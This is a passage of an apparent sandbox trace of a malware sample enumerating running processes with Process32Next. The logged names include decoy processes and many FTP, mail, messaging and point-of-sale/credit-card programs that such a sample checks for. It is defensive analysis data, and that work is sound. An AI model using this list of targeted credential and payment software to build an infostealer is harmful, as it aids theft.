th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0054.331] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0054.332] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.332] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0054.333] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.334] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.335] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.336] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.337] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.338] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.339] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.340] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.340] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.341] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.342] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0054.343] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.344] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0054.345] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x3b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0054.345] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.346] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0054.347] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x41, th32ParentProcessID=0x7c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0054.348] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x828, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0054.349] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0054.350] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0054.350] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0054.352] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0054.352] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0054.353] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0054.354] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="fur.exe")) returned 1 [0054.355] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="packages_omissions.exe")) returned 1 [0054.356] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="fame-vat.exe")) returned 1 [0054.357] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="honors_shoe_diabetes.exe")) returned 1 [0054.358] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x520, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="superb last.exe")) returned 1 [0054.358] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="threaded_allergy_bacteria.exe")) returned 1 [0054.359] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="successful_carmen_mud.exe")) returned 1 [0054.360] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="searching-municipal-mm.exe")) returned 1 [0054.361] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xcdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="fifty.exe")) returned 1 [0054.362] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="rope_woods_bracelets.exe")) returned 1 [0054.363] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sitemap_instructors.exe")) returned 1 [0054.364] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="underwear_consolidated.exe")) returned 1 [0054.364] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="dear hearings faq.exe")) returned 1 [0054.365] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="effectiveness.exe")) returned 1 [0054.366] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0054.377] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="pest.exe")) returned 1 [0054.378] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="intl-costume.exe")) returned 1 [0054.378] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="expressions_binding_prospects.exe")) returned 1 [0054.379] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0054.380] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0054.381] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0054.382] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0054.383] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xdfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0054.383] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0054.384] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0054.385] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0054.386] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0054.387] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0054.388] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0054.388] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x574, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0054.389] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0054.390] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0054.391] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0054.392] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0054.393] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0054.394] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0054.394] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0054.395] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0054.396] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0054.397] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0054.398] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0054.399] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0054.400] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0054.400] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xcbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0054.401] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0054.402] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x430, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0054.403] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0054.404] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0054.405] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0054.406] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0054.406] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0054.407] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0054.408] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0054.409] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0054.410] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, 